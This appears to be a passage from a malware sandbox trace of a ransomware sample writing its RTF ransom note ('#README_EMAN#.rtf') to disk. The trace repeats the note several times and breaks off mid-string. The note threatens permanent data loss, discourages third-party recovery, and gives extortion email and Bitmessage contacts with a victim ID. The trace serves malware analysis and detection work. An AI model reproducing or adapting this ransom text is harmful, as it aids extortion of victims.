{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.134] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.134] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.134] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.135] CloseHandle (hObject=0x294) returned 1 [0285.135] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 